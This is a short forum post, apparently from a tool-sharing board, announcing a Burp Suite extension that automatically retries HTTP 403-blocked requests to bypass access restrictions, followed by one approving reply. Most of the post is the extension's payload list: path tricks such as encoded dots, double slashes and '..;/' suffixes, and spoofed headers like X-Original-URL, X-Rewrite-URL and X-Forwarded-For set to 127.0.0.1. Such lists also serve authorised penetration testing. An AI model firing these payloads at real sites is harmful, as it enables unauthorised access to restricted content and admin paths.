itsMe Posted December 5, 2020 Share Posted December 5, 2020 This is the hidden content, please Sign In or Sign Up An Burpsuite extension to bypass the 403 restricted directories. By using PassiveScan (default enabled), each 403 requests will be automatically scanned by this extension, so just add to burpsuite and enjoy. Payloads: $1: HOSTNAME $2: PATH $1/$2 $1/%2e/$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H “X-Original-URL: /$2” $1/$2 -H “X-Custom-IP-Authorization: 127.0.0.1” $1 -H “X-Rewrite-URL: /$2” $1/$2 -H “Referer: /$2” $1/$2 -H “X-Originating-IP: 127.0.0.1” $1/$2 -H “X-Forwarded-For: 127.0.0.1” $1/$2 -H “X-Remote-IP: 127.0.0.1” $1/$2 -H “X-Client-IP: 127.0.0.1” $1/$2 -H “X-Host: 127.0.0.1” $1/$2 -H “X-Forwared-Host: 127.0.0.1” $1/$2%20/ $1/%20$2%20/ $1/$2? $1/$2??? $1/$2// $1/$2/ $1/$2/.randomstring $1/$2..;/ This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
J0k3rj0k3r Posted January 14, 2021 Share Posted January 14, 2021 Great tool! Link to comment Share on other sites More sharing options...
Recommended Posts